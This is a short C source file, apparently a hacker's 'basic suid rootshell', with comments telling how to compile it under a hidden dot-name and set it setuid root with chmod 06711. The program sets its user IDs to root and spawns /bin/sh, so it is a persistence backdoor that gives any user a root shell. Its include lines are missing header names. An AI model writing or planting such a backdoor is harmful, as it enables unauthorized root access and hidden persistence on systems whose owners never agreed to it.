/* suid rootshell basico #gcc -o .rshellb rshellb.c #chmod 06711 .rshellb c0d3d by Spy]-[unt3R */ #include #include int main(){ setreuid(0, 0); system("/bin/sh"); return 0; }